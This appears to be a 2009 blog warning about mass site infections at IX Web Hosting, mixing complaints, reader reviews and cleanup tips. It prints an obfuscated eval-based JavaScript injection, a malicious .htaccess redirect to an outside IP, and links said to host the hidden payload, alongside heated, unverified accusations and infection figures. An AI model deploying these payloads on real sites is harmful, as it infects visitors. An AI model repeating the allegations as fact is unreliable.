Numerous sites on IX servers NS3 and NS4 INFECTED

During the last 4 days Numerous People are reporting their sites are infected, and customers are being re-directed to a Russian site.
So far ALL the sites reported are hosted on NS3.IXWEBHOSTING.COM and NS4.IXWEBHOSTING.COM.
If your site is hosted on these servers, OR possibly other servers, you should check your website, by using a SEARCH ENGINE. DO NOT go directly to your site through your search bar OR shortcut, but use a Search Engine. The results are being re-directed. It will also be a matter of time before these sites will be “Blacklisted” by Google and other search Engines.

Feel Free to contact IX Web Hosting about this matter, but they will only blame you for their issues, and  lack of  knowing how to treat their customers with respect.

Please send us a message if your site has been comprimised.

EASY Access to IX Web hostings Server ROOT

From a Unhappy  IX  customer

I was beginning to think I was crazy. My site would get hacked and I would change the password. This would keep happening over and over. Yet every time I would call in they would say it was my fault. Well today I discovered that once again my site had been hacked as well as all the other domains in my userid for them.  While going through one of my sub domains I found a hackers control panel which I downloaded and took a screen shot. I even looked around in it. I realized quite quickly that I had server root access and I could see other peoples files like I was on a regular computer. This control panel seems to have it all. Anyway here is a screen shot for all you who wonder what is going on:

I have marked my info out to spare me as well as the folder I was browsing. But this control panel seems to have any exploits you want on it with very little effort.  It even has a handy self kill button which I used. Of course I am sure they will be back and hack right back in. Meanwhile I have to look into another host.

CLICK ON IMAGE FOR LARGER PREVIEW

 

IX Web Hosting, Script Injection and banned by Google 2

So many people being banned by Google, and cannot find the source of the Injection..

 I have previously posted on this blog WHY you cannot find the code.. Because  the code is NOT on your page. The code is, and can be anywhere on the server ( I have posted 3 links to the code that was hidden as a .jpg)  The code added to your site is actually an Iframe, so what you should be looking for is a small snippet of code that calls the script. ( check your Config, Header, Footer, Index.php etc.. ALL pages that get called on every page

Yesterday someone contacted me with this issue, and that person was also banned by Google, and had spent weeks trying to solve this problem.. They  finally found the code in the CONFIG File . ( thanks to this blog)
The site is now clean, but it will only be a matter of days before it is injected AGAIN!!

Here is the post I posted in December last year:

Hundreds of  IX customers, are contacting me to ask about the Injected script ( posted in a previous post) they are asking me HOW to remove it, because they cannot find it…

The Reason they cannot find it??

Because of a MASSIVE SECURITY ISSUE on IX WEB HOSTING’s SERVERS!!.. the script is NOT actually put onto any of your pages, the script is actually hidded somewhere on the server..

So far I have found 5 “seeds” .. These are the codes that are appearing  in  over 100,000 sites

( These have now been removed by ix web hosting but as you can see, the actual file is well hidden and disguised as an image. REMEMBER, this is where the files were stored that YOU can see on YOUR pages )

• http://on3photo.com/onlinestore/photos/106-firefighter_foto/1147-gustav_deployment/di_img_0002.jpg 
• http://adventuresinstorytelling.com/modlogan/m_usage_200603_001_008.html

Remember to view the “source code” in the above links.

Very interesting is the second “seed” that is actually in an IX standard “modlogan” folder, that is standard a chmod 700 .

Secondly it should not be possible on any shared server to inject this script onto EVERY file on that server. The fact that this is happening means that IX web Hosting has not got a clue how to protect their servers, and customer web sites. 

So as you can see, this script IS  NOT actually put into your script, that is why you cannot find it.. HOWEVER, somewhere on your site, there is a bit of code  ”Calling” this script, and that appears in your pages.
Check  ALL the pages that get called for every page, ie. header, footer, index, config, sidebar etc. 

So far I have evidence and proven that the following IX servers running the following Database’s  are seeded:

• mysql33.ixwebhosting.com
• mysql15.ixwebhosting.com
• mysql27.ixwebhosting.com

If you know of any others that are seeded, please let me know.

Hope this helps

:: Some people have contacted me to tell me that the Injected Script is ( also ) injected into the database, and in some cases a new table is created.
I have checked 9 databases of infected sites, and I have not yet come across the script in my Database’s, so I think that this might be “script” related, maybe that some scripts such as PhpBB2 allows for this to happen, so I recommend searching your Database for the script as well ::

=================================================================

This issue has now been going on for more than 10 months…. 1 year this May.. Will IX Web Hosting be celebrating  this milestone?

Tip from a reader “How to clean the Yahoo Counter Injection Script”

Hey buddy, 
nice website, i wish i had seen it before I renewed my contract with the crooks at IX for 2 more years…
well, i am writing because i couldn`t find on your website a solution to clean the infections automatically. so maybe you want to post a solution:

here is what I did:

1 – download the entire site
2 – Open an infected file with Adobe Dreamweaver
3 – Look for the infected code, select all of it and copy it to the clipboard (starts with “<?php if(!function_exists(‘tmp_lkojfghx’))…”). You must copy ALL the code!
4 – Still on dreamweaver, click on EDIT>FIND AND REPLACE
5 – on the FIND box you paste the infected code 
6 – On the FIND IN dropdown select FOLDER and point it to the folder where your website was downloaded.
7 – click on REPLACE ALL (dreamweaver will replace the code with whatever is on the REPLACE box, as we didn’t write anything there, it will clean the code)

I found out that all the infected files on my sites had exactly the same code, so it was quite fast to remove them.

 

Ivan

Thanks Ivan for your feedback, I hope this helps others, also sorry to hear your sites are still constantly being injected. It’s clear that IX Web Hosting still has not got a clue how to solve this issue, and on top of this they are having 3 other mayor issues to deal with.

IX Web Hosting has SERIOUS database Issues and lots more

In the past months, 1000’s of IX Web Hosting’s customers finally turned their back on the “Cheap, Unreliable and Insecure ” Web Host. This was due to the fact that more than 140,000 sites were hacked and injected on a WEEKLY bases, things got so bad that even the “Backups” were infected and deemed useless.
From   May 2008 onwards IX Web Hosting continueously blamed their customers, mayor search engines, WordPress, Joomla, and every script on the market, actually, it was everyone’s fault, except IX Web Hosting.

The past 4 weeks I have recieved and seen an alarming amount of customers furious about the “Downtime” of their sites.

Downtimes of  6+ hours is normal…

I am curious who IX WEB HOSTING is going to blame this time

Shira, 12th 2009f February, 2009

We’ve spent the last week uploading and creating database on our new IXWebhosting account. BIG MISTAKE. All of the database sites give random server connection errors more often than not and the server service in general is extremely unreliable. The online “Tech support” chat is a complete joke. Not once have they been able to resolve the problems we’ve communicated, and we have to chat them about 5 times a day. We’re closing our account today before serious damage is done. Pete, 11th 2009f February, 2009 AVOID like the plague!!! Every one of their web servers have been hacked in the last few months. If you have any sites with them, it’s just a matter of time before your code is injected with viruses and phishing pages or completely diverted to a scam web site. If you have an account with them, do what I did… Get the hell out now before all of your sites are blacklisted. Try www.**********.com. They cost a bit more but you get what you pay for. F**K YOU IX, 10th 2009f February, 2009 I’m so sick of the feeble excuses ix web hosting come up with. I the past week I have called them at least 3 times everyday because so far my sites have been down on average 3 hours a day. Everytime I get to hear how sorry they are, and that the issue will be fixed within 20 minutes!! It really is time to get a class case together and sue IX for compensation. Erik, 09th 2009f February, 2009 All 12+ of my domains were down much of Feb. 7, 2009, and since at least the afternoon of Feb. 8, 2009, they’ve been down again, and all of my sites’ files are totally gone. They’re “still working” as of this morning, Feb. 9, 2009, but they cannot say much more. Time to move on. Milano, 09th 2009f February, 2009 Today I got a call from a friend telling me my sites contained a virus, I googled my site, and when I clicked on it my Anti Virus blocked it with a warning, I then checked all my other sites and they all contain the same script. I called ix, had to wait 25 minutes, probably a lot of customers with the same problem.. I was told very bluntly that it was a well known issue with WordPress, I have been using wordpress now for 4 years, and always use the latest stable version, I contacted WordPress, and they assure me that there are no known issues with WordPress. I then called ix again, and this time they blamed my computer, saying it is infected, and that I uploaded the virus. IX is an absolute nightmare, and I am moving all my sites away from them, and I will file a complaint with the BBB Herman, 08th 2009f February, 2009 Last week I had a phone call from a customer why I had not sent them an Email, I reassured them that I had, and that I would resend it 2 days later completely pissed off because they still never got the Email. So I sent an Email to one of my own Email accounts.. I never got it, so I tried sending it to another 5 Email accounts.. out of those 5 emails I got just ONE, but it took TWO days to reach me. I contacted support on the chat, and he told me there was a backlog of mail because of a “Spam Filter” , he told me to create a Ticket which I did, I sent a ticket on Friday morning, and Today ( Monday) I still have not had a response. So to break it down, ( this is what I know for certain) I have sent 8 emails, and only recieved ONE 2 days after I sent it! This is absolutely absurd, now I do not know how many people I have sent Emails to that never got them. Do yourself a big favour and stay away from ix web hosting, they just have not got a clue, or they just don’t care, or both.   elawcase@gmail.com, 07th 2009f February, 2009 Anyone interested to sue ixwebhosting.com due to their bad servers and not providing what they promise, please contact us at elawcase@gmail.com. I have tried many hosting companies and ixwebhosting is amongst the worst. Their server will go down frequently. We received so many complaints from our own customers that the website is not working. We get this just about everyday. And two days ago ixwebhosting.com servers were down for 4 hours. Yesterday it was down 3 hours. Today it is down now for over 2 hours and we are still waiting for the servers to work. We are hosted on NS13, NS14. This has got to be the most frustrating experience in our 9 years in ecommerce. We made the fatal error trusting to host our site with ixwebhosting.com. The first two months were okay but then after it went downhill. I think maybe they work really hard during the trial period so you cannot refund the month. I’m stuck now with a long period of webhosting plan. They won’t refund either and they will not provide you a good working server. John – HELP SERVER DOWN, 05th 2009f February, 2009 Hello I cannot believe how many times the server is down.. It has been down for over 1 hour and now they are telling us another hour. This server really sucks.. here’s the chat logs. Lesya Geychenko: Sorry, we really experience some problems on our server, but I want to ensure you that this is temporary and we will fix them as soon as possible you: pls .. it has been down for 1 hour you: every day down Lesya Geychenko: I am so sorry, our admins are working on the issue Lesya Geychenko: Sorry, we do not have any ETA yet, the issue will be fixed as soon as possible you: we have to contact ixwebhosting just about everyday about the servers being down.. this is not the service we have paid for Lesya Geychenko: I understand your concerns about this, you can create a ticket and provide statistics on the server side issue and ask for permanent solution you: we have already you: what’s going on? you: over 1 hour you: hello, any updates so far? Lesya Geychenko: Yes, our admins are working on the issue, they will send a notification to me when they finish you: please Lesya Geychenko: The issue should be fixed within 15 minutes you: ok Lesya Geychenko: I am extremely sorry to tell you, I just got the news from our admins you: ok Lesya Geychenko: They maintain the server longer than I have expected Lesya Geychenko: The server will be up in 60 minutes you: ixwebhosting is really unreliable….. Heidi, 03rd 2009f February, 2009 Just got off the phone with ix, for the past 2 weeks every evening at 6 o clock my sites stop loading, and I cannot retrieve my Emails. It is so frustrating that the support just say that everything is working fine. I’ll be looking to move my sites.   Matt, 02nd 2009f February, 2009 The server is currently down. IT is down about every 5-10 minutes for 30 seconds – 2minutes. Right now it has been down for over 10 minutes. We need to get to our database and info but we can’t. This is just bad for us. ixwebhosting.com really cannot get it right. We have contacted them over 100 times in the past month but they keep saying they fixed the problem. I don’t see how ixwebshosting rating is high on the right menu on this website. It means they probably get some cut when referring clients.   George , 30th 2009f January, 2009 If you are planning to run a serious website, DO NOT use Ix web hosting, they are more trouble than they are worth. Virus, Slow, Database problems, and Email issues.

Daily Top 10 Searches to this blog

As of today I am going to post the  TOP 10 Search Engine Terms  people use to find this site.

As you will see, there are a lot of issues going on.

Search Engine Terms

These are terms people used to find this blog.

Todays  Search 

1. ix hacked  
2. ixwebhosting virus  
3. ixwebhosting hacked  
4. ixwebhosting  
5. ix webhosting hacked 2008  
6. https://ixwebhostwarning.wordpress.com/  
7. ix web hosting has been hacked  
8. https://ixwebhostwarning.wordpress.com  
9. ix webhosting htaccess  
10. ixwebhosting .htaccess hack  

Yesterdays  Search 

1. ixwebhosting hacked  
2. ixwebhosting malware  
3. ixwebhosting malicious  
4. fix ixwebhosting .htaccess  
5. modlogan hacked  
6. htaccess exploit passwords ixwebhosting  
7. ixwebhosting exploited  
8. how to remove yahoo counter injection fr  
9. access htaccess ixwebhosting  
10. ixwebhosting hack

Join forces to SUE IX Web Hosting

[ from an ix webhosting customer ]

Anyone interested in joining forces to sue ixwebhosting.com due to their bad, insecure servers and not providing what they promise, please contact us at elawcase@gmail.com

I have tried many hosting companies and ixwebhosting is amongst the worst. Their server will go down frequently. We received so many complaints from our own customers that the website is not working. We get this just about everyday. And two days ago ixwebhosting.com servers were down for 4 hours. Yesterday it was down 3 hours. Today it is down now for over 2 hours and we are still waiting for the servers to work. We are hosted on NS13, NS14. This has got to be the most frustrating experience in our 9 years in ecommerce. We made the fatal error trusting to host our site with ixwebhosting.com. The first two months were okay but then after it went downhill. I think maybe they work really hard during the trial period so you cannot refund the month. I’m stuck now with a long period of webhosting plan. They won’t refund either and they will not provide you a good working server.

IX Web Hosting’s PHP Upgrade Notification

Dear Nicole **********,

We are happy to inform you that over the next two weeks we will upgrade PHP to the latest 4.x version (4.4.9) on the web server your website is currently being hosted on. This upgrade will resolve many security exploits and make services more stable.

As part of this upgrade, we will migrate from an Apache Module to a CGI based installation that gives you more control over many PHP settings. Once implemented, you will have the ability to upload your very own php.ini file into your cgi-bin folder as needed.

After the upgrade, your website may experience a few errors, all of which can be quickly resolved. Most are caused by having PHP directives inside an .htaccess file.

To fix this problem, simply login to your control panel and click on the WebShell icon. The .htaccess file will not be viewable unless you have “show hidden files” checked in your WebShell settings. Open the .htaccess file and remove any lines that start with “php_”. If you need to retain these settings, then they must now go into a php.ini file and placed into your cgi-bin folder.

If you are running PHP in any of your HTM/HTML files, please add this line to your .htaccess file:
AddHandler php-script .php .php3 .php4 .htm .html .phtml

If you have any questions or concerns about this upgrade, please do not hesitate to contact us 24/7 via live chat, ticket, or phone support and we will be glad to assist.

I hope you will enjoy the new features and increased security!

Best Regards,

Fatima Said, CCO
IX Web Hosting

IX Web Hosting still blames 777 permissions

Hundreds of unhappy IX Web Hosting Customers are contacting me, telling me they are still being blamed for the Yahoo Counter Script Injection and the .htaccess hack.

IX is blaming ” Folder Permissions ”  saying 777 should not be used, and in the case that NO FOLDERS are being used, they turn to the ” Ftp Virus”   BOTH of these are complete rubbish and LIES, and if you corner an IX Web Host manager with some facts and a bit of knowledge they will admit that it IS an issue on the ” IX Servers”

I have been PERSONALLY told by THREE MANAGERS.. Kenny, Drew and Lauren that IX is aware that they have security issues, and each time they assure me that the problem will be fixed soon, that was 9 months ago!!
The problem has not been solved, and is nowhere near being solved, actually it is getting worse.
Almost 10 months ago the problem was the iFrame Yahoo Counter was injected into every file, today the problems are numerous 3 different  injections and a .htaccess hack!! on both the php4 and php5 platform.

So, why is IX Web Hosting admitting they have issues to certain people, and LIEING to others? The reason to this is because the Support Monkeys have been told to NEVER admit that IX has issues, if the monkeys admitted to every customer that it was due to IX’s security issues that more than 120.000 sites were being infected on a weekly basis, all hell would break loose and somewhere along the line someone would sue.
So, as of yet for as far as I know it is only certain managers that are admitting to certain people, that IX is to blame.   

IX Web Hosting blames 777 folder Permission!!!… Do me a favor!!, it’s 2009, HUNDREDS OF MILLIONS of people are using Open Source CMS (content management system ) such as WordPress, Joomla, Drupal etc..etc..
Many of these scripts will not work without 777 permission ( images, templates etc)

If in 2009 IX Web Hosting cannot host a CMS site  without it getting injected or defaced, then they are NOT FIT to host websites and should pack their bags and leave town … for good!!

Why is it, that IX has a page on their website that explains in detail how to install and use WordPress and Joomla, but they still blame customers for using these CMS scripts.

Next time you speak to an IX  Support  Monkey ask them how the following  is possible

1. 5 html sites ( 100% html) not running any scripts or folders get injected?
2. How is it possible to MASS overwrite 644 files (.htaccess)
3. How is it possible to MASS add .htaccess files
4. Why is it, that if I did have an Ftp Virus, they only inject 2 buisness accounts, when they would have access to all 4?.. Why dont they inject all 4?
5. Why is it only IX Web Hosting and Host Excellence ( owned by ix web hosting) are having these problems? if it was a 777 folder permission issue 100’s of Millions would be affected, and EVERY webhost in the  world would have the same problems.
6. ANY Server Side injection of 1000’s of sites is surely the responsibility of IX, and NOT a Folder Permission issue.. I have access to all my folders, but there is no way that I can access someone elses site.
   It’s clear that this issue is server root related.

One more thing, a 777 folder used by the likes of WordPress or Joomla ARE SAFE!!..  Does IX Web Hosting really believe that they can carry on blaming customers? MORE THAN  ONE THIRD of ALL IX Web Hosting sites are infected!!… More than 120.000 sites infected !!

IX Web Hosting making money from their INSECURE SERVERS

For going on 10 months now ix web hosting’s servers have been under attack, both the older php4 and the new php5 are full of security issues, and have been seeded and are constantly injected with various scripts and / or the .htaccess file gets renamed and customer sites are re-directed.

MORE than 120.000 IX hosted sites are injected / .htaccess hacked on a weekly basis, an excellent oppertunity for the scum IX to make a quick buck!!

IX Web Hosting will clear up the mess that is caused by their extreme Incompetence and INSECURE SERVERS for just $80 AN HOUR!!

A few days ago I was contacted by an IX customer that hosted 5 html sites ( not a single script)  all 5 websites were injected with the Yahoo Counter Script, this was the 3rd time in one month that this had happened, each time she just  re-uploaded all her sites, but still her sites got injected. The 4th time she approached IX to help her get her sites back in order. IX charged her $160 ( 2 hours) to get her sites back to normal. 6 DAYS later all her sites were injected, but luckily the bastards at IX were willing to help her again for another $80 an hour.

Is YOUR site INFECTED by the Yahoo Counter or .htaccess

A lot of people are contacting me, asking HOW you would know if your  site is infected?.
Let me start by saying that in some cases you will know immidiately when somthing is wrong, but in other cases it might not be too clear.

The YAHOO COUNTER SCRIPT

Click Image to Enlarge

is an iFrame Javascript injection that injects code into the Footer, Body, or Header, or all three at once.
Thousands of IX web Hosting customers are infected with this code, and they do not even know it! The web Page looks normal, but this can be very dangerous, your website will eventually drop from ALL the mayor search engines, and your domain will be flagged as “Dangerous Malware” by all the search engines.
To check if you have the Yahoo Counter injected, visit any search engine, and visit your site, If your site loads as it should, BUT  it still shows “Loading” in the taskbar for some time, and then in most cases ( but not always) an ” Acrobat Reader” Error message will pop up.

Now you must Check the “Source Code” ( Menu Bar –> View –> Source ) and you will notice the Code that has been injected.

 

The .htaccess Injection

This is a very sneaky Injection, the reason being, is because most people that have and check their websites, access them by either a shortcut, or directly through the search bar by using the url, In both these cases, your website will be perfectly normal, BUT, anyone trying to access your website  through any of the mayor Search Engines, will be re-directed.

Click Images to Enlarge

Once that is done, a FAKE ANTI VIRUS will pop up, and start scanning your PC, it will then alert you that you have dangerous files on your PC, and if they should be removed, if you click YES, you are screwed!!, a Trojan with KeyLogger will be executed on your PC, and you are INFECTED!!…

Anyone who has the FAKE ANTI VIRUS pop up, should just click off the site NEVER click “Yes” or “No”.. just click OFF the page , if your PC freezes, use “Ctrl-Alt-Delete” and Stop the process… then out of precaution you can “Delete” your cached internet files.

An example of the injected .htaccess file.

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* h**p://87.248.180.89/topic.html?s=s [R,L] ( link altered by ME )
 

Remember, you only get re-directed if you click on your url from a search engine

IX Web Hostings Servers using both Php4 and Php5 INFECTED

As I wrote yesterday, MORE THAN ONE THIRD OF ALL IX Web Hosting’s hosted sites are INFECTED.
And to make things worse, the problem is spreading.
Up until Jan. 3rd 2009 it was only the older servers still running Php4 that were being affected, but now even the NEW server blocks, running Php5 are being injected.
IX Customers with sites on the server block with mysql address mysql501.ixwebhosting.com that runs php5. are being injected.

This is bad enough, and the fact that after 9 MONTHS!!! IX Web Hosting has still NOT GOT A CLUE how this is being done is a complete DISGRACE!!
And to add salt to the wounds, IX is not just being attacked with one form of iFrame injection, NO, IX is being attacked THREE different ways.
1) The notorious ” YAHOO COUNTER” is being injected into the FOOTER of every file.
2) The .htacces File that is overwriting and / or adding an . htaccess file into the root of every site and re-directing sites
3) As of Jan. 3rd 2009, a SECOND but modified version of the ” YAHOO COUNTER ” iFrame injection is now being injected into BOTH the Header, AND / OR Body of every file.

Today an IX Web Hosting customer sent me a link to their site, that was injected with THREE Yahoo Counters, Header, Body and Footer.
The owner of the site told me that the site would take ages to load, and would often even timeout, and Google had dropped the site completely from the Search Engine, penalized because of the “Malware Script”

Here is a quote from IX Support’s Alex Karamushko :

We have currently problem with Yahoo counter hack, but our system administrators and security analysts working hard for finding exact reason of that problem and we can assure you that this will be fixed shortly.

After 9 months, I ask myself what ” shortly” actually means?!.. Another week?, month?, or maybe 3 months?.. because I was told by “AGENT IX” that at the rate things are going now, by May 2009 EVERY website hosted at IX will be infected by these injections.

IX Web Hosted sites Hacked & Defaced Jan 9th 2009

http://efamili.com/

http://dabasan.com/beads/archive.php

http://www.capetowntips.com/

http://icaav.com/phpBB2/

http://buildingwithtyres.com/

http://www.mortgageservices.com.au/

http://terrybeitel.com/

http://ebookdirectory.net/

http://www.strangeauction.com/

http://annualkellyfamilyreunion.com/forum/

http://www.scotlandsguesthouses.com/

http://www.themerchfoundry.co.uk/helpcenterlive/

http://mediaportalen.net/

More than ONE THIRD of ALL IX Web Hosting sites INFECTED

A lot of the information I post here, I get from a person that works for IX Web Hosting and / or Ecommerce, as you all understand I cannot give any details that could compromise  his / her position. I will call this person “AGENT IX”

Today I recieved an Email from “AGENT IX”  that states that more than 100,000 IX Web Hosting Sites are infected.

The Details are, that IX Web Hosting is hosting 285,223 websites ( source http://whois.domaintools.com/ixwebhosting.com 

More than 100,000 sites are infected, which means that more than  1/3   of all IX Web Hosting sites are infected!!
and IX has still not got a clue how to stop these attacks.

Also the injected script(s) are changing ( see previous posts) which most likely means that this  vulnerability is now being exploited by various people / groups, and this also means that this problem is going to get a lot worse before it gets better, this problem has now been effecting sites since last year May ( 2008 ) almost 9 MONTHS LATER  the problem is worse than it has ever been, and there is no bright light at the end of the tunnel yet.

A NEW wave of iFrame Injections for IX Web Hosts Customers

It has come to my attention that a NEW wave of iFrame injections has infected 1000’s of new IX Web Host Customers, unlike the previous injection, that injected javascript into the footer of every file, this new piece of code is being injected into the “Header” of every file..

The new code looks like this:

<script language=JavaScript>function tobnb25(z){ var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,62,45,0,25,55,44,41,2,31,0,0,0,0,0,0,3,38,33,21,20,16,19,10,42,35,13,32,24,17,4,40,46,56,53,
15,60,5,50, 47,57,48,51,0,0,0,0,26,0,49,6,29,7,12,54,34,23,28,58,11,14,36,43,27,8,59,52,39,37,30,61,1,18,22,9);for(s=Math.ceil(c/m);s>0;s–){h=”;for(i=Math.min(c,m);i>0;i–,c–){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(224^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}tobnb25(’hAOIN1QtlSztwx4tFfvam1OIUuTfN1QKCfLBlx7ZhG4gDypVdZcgbG4KJypYlbLIUfcf4FLrE@TmxlL
58IptD87fS0TRF84BUxOZzjOBS1etS0vak5_KD gOZx1LtlxpV2bptpj6mwjpBSfpVzneRCkJRLsTVdscfNbJrdWTa8@TtzxptpfJRDIJYpyLgdgptcdJrM
@TmDAzIUf2YNAQmEVLK4H2ISjLB8qJ5SsOBxbLIUjvaz@’)</script><!– yourdomain.com –>

 

Manager Kenny at IX Web Hosting  informed a customer today ( Mon 5th Jan.) that  they were testing right now and should be completed in a week or two…

ONE OR TWO WEEKS!!!.. Hey we have been waiting for 8 MONTHS!!!!  You would think that by the advice is giving all their paying customers, and blaming them for everything,  and then offering to fix the problem for $80 AN HOUR!!.. that they would know how to fix this problem, but is is clear they do not, and instead of putting more time and effort into solving this, what does IX do??… TRY AND MAKE MONEY FROM THE PROBLEM!!!… Thats correct, IX Web Hosting is offering to fix / clean customer sites for $80 an hour!!…  This is an absolute disgrace!!

To me it is clear that a large group of people know the vulnerability at IX servers, and various people are now injecting their own script, thats why we are starting to see various different scripts appearing.

IX Web hosting Reviews Dec. 2008

Seve, 29th 2009f December, 2008

Ooohh alright, I’ll GIVE them away!!Still no takers?.. Don’t blame ya!!

Steve, 29th 2009f December, 2008

Anyone want to buy my 2 buisness Accounts I have with IX ? I’ll sell them for a good price.. IX is the leader in quality Web Hosting, and comes with top notch support.. especially if you speak Ukrainian.. C’mon be part of history, IX might not be around for much longer.

Rich, 29th 2009f December, 2008

IX is so full of shit, I can smell them fro here. These dickwads are clueless, they are a laughing stock. Anyone hosting their sites with these people need to seriously start looking for another host. IX is gonna get a hell of a lot worse before it gets better.. thats if they survive the loss of so many customers.

James, 29th 2009f December, 2008

6 weeks ago I purchased an account with ix webhosting, in this 6 week periode my site has been cleaned and re uploaded 14 times!! every other day it gets injected with a .htaccess file, and gets redirected. I do not have any scripts for my site an no .htaccess file. ix has constantly blamed me for this. Luckily I only have one site, I’m counting my loss and moving away.

Bart de Vries, 29th 2009f December, 2008

A complete bunch of ignorent stuck up turds!!.. couldn’t run a stopwatch, let alone a hosting company.

Oz, 29th 2009f December, 2008

IXWEBHOSTING is bent!I mean all my domains had a .htaccess file which redirected all search engine traffic to another website (located at starnet.md) to download malacious files (virus). This is the contents of the .htaccess file: RewriteEngine On RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC] RewriteRule .* http://87.248.180.89/topic.html?s=s [R,L] It’s rewriting code to direct all users from Search engines away from my websites. Good bye IX!

Juloep, 28th 2008f December, 2008

I just read this website and here you can see that ix people are thiefes https://ixwebhostwarning.wordpress.com/

Juloep, 28th 2008f December, 2008

I have holiday for 6 days, and when I get home my website has gone, instead a page tells everyone my web site is terminated.. I call ix and they tell me my site was phishing site.. I tell them that it is a mistake, my website is about hotel in Tunisia.. I ask for them to please put my website back because people think I am now a thief but they say i must buy a new account. these people are VERY bad people, they make me look like thief but they are thief!!

Eddie, 28th 2008f December, 2008

http://www.psedog.com Another website screwed by IX. Luckily I was nearing the end of my contract when they decided to suspend my account for “Phishing” All the suspected folders had permissions of “httpd”. A week prior to IX shutting my site down (Suspended). They had informed me that my site had been “hacked” and had a virus in it. They claimed to have fixed it. Only to shut down my site shortly after. Look at some of the recent comments under mine and you will see that I’m not the only one. IXWebHosting is crap. I only dealt with it for as long as I did because I had already paid. Unfortunately I didn’t have the site as a whole backed up. Now I have to go and rebuild it again from multiple sources.They shut my site down 2 other times before. They claimed TOS for copyright infringement. The infringing products were my own pictures from my car club in Souther California. Apparently I’m not allowed to have a nice car and know others that do as well. (G35Driver)

Jack Brown, IT Director, 26th 2008f December, 2008

The best hosting company list at: Mavaron.com http://www.mavaron.com

John M, 26th 2008f December, 2008

I am so pissed off with ixwebhosting, they know they have an issue with their servers, but they still blame the customers. I have 2 static sites, and they have been injected nad the files permission changed to httpd. When I phoned support I was blamed for in-secure folder permissions, when I told them I did not have any folders, they told me to purchase an anti virus software, and scan my pc!! I told them My McAfee AV is 2 months old and up to date, and scans every Tuesday and Friday.. Then they told me to TRY ANOTHER Anti Virus software Keep away from these idiots

Tom, 25th 2008f December, 2008

Today without warning ix web shutdown my account, because I ran a script on it, I have a photography site for newly weds, I know nothing of any script. They are rude and are blaming me for their problems. How can I get my database and all my files? Can I sue them?

Jacque, 25th 2008f December, 2008

Once they were a very good company, but now they are the worst, and the worst just keeps getting worse. Avoid ix web hosting until they get their act together. more info https://ixwebhostwarning.wordpress.com/

Babs, 25th 2008f December, 2008

What a nightmare!! Talk about crooks, it is beyond me that IX is still in buisness. I would not host my site with them for FREE Been there.. done it… got the stress

2 matt, 25th 2008f December, 2008

Hi there, go on http://www.dickgreasley.com to check how fast the server is. On bottom of the website is link to EBH.

matt, 18th 2008f December, 2008

ixwebhosting.com server has been down for now 3 hours. My company cannot retreive important data. I think this company is so damn unprofessional. If anyone has any other suggestions for other good webhosting companies, please do let me know!

cashzzz, 18th 2008f December, 2008

Server has been down now for over 2 hours….ixwebhosting keeps telling us to wait 15-30 more minutes… we cannot keep waiting like this. They said the server is under maintenance, but the server should not be down like this for more than 2 hours.. not sure how much longer…

cashzzz, 18th 2008f December, 2008

Server is down as of now. for over 1 hour 30 minutes… we are told the server will be up another 30 minutes but that was 30 minutes ago.

Chris, 17th 2008f December, 2008

It was a nightmare dealing with these horrendous people at IX Webhosting.- For the seven months my site was hosted there, there were a lot of slow downs, database cut-offs and data lost, and they never provide any compensation or explanation of why that happened – IX reserves the right to cut off your website at anytime whenever they feel like to. At first they would not tell you they are going to cut you off, they just asked you to accept their TOS terms of service. Once you did that they cut you off immediately. – Worst of all, they do not allow user to download their own website or database once they suspended your account. If you are not prepared you will be totally screwed. I have never seen hosting company not providing user their database when they move out of the host. – Technical support is horrendous, either the person there just try to play dumb or are complete idiots. They do not listen to your words, they just repeat themselves over and over again as if they are merely answering machines. – Make sure you read every single word in their terms of service, there are a lot of unfair terms to the user, make sure you are alright with every single term in there before you sign up. These guys sure know how to make a fool of you by playing with the terms.

they are bad, 16th 2008f December, 2008

Koima They are pretty bad , but have you checked out IPower.For years of consistant appalling service, i doubt you’d get any worse – anywhere . Why nearly all of the top 10 listed here are still in business is beyond me – most (not all) of them are not worth counting anywhere in the top 1000!

Koima, 12th 2008f December, 2008

WOW, I never see so many bad comments I think I will never use ixwebhosting

fuckIX, 12th 2008f December, 2008

ixwebhosting can kiss my arse. 2 years of these pathetic people is enough. IX does not give a damn shit about customers, they take your money and screw you BURN IX BURN!!!

David Lee, 11th 2008f December, 2008

My htaccess file was replaced and my website was down yestoday. It seems like nothing they gonna do to make their hosting service to be the one it should be. I have to upload htaccess every 4 days. ixwebhosting is a shit! I want my money back!

Sandra, 11th 2008f December, 2008

I am so glad that I only have 2 web sites with these crooks. I wish I had found this site before. I purchased my account 7 weeks ago, and since then I have had nothing but trouble, in those 7 weeks I have had to upload backups 11 times!! I tried to use their support 3 times, but each time all they said was I needed to create a ticket.. Bottom line, AVOID IX web hosting

Harry, 09th 2008f December, 2008

IX wehosting is a 100% rip off, I cannot understand that they are still allowed to sell hosting. My sites are hacked on a weekly basis. Support are a bunch of ignorant retards that belong in a Zoo cleaning up the animal shit!! IX web hosting, Please do yourself a favor, and pull the plug!! You are without doubt a disgrace to the hosting world.

J C, 01st 2008f December, 2008

Our websites has been Hacked again We were connected with IXWebHosting Now we have enough and cancelled our multiple accounts with them

IX Web Hosting and the Yahoo Counter Script Injection

I started this blog just 2 weeks ago, and today I recieved my 1000 th  Email asking me about the code that is injected into the footer of every file hosted on seeded IX Web Hosting Servers.

Hundreds of  IX customers, are contacting me to ask about the Injected script ( posted in a previous post) they are asking me HOW to remove it, because they cannot find it…

The Reason they cannot find it??

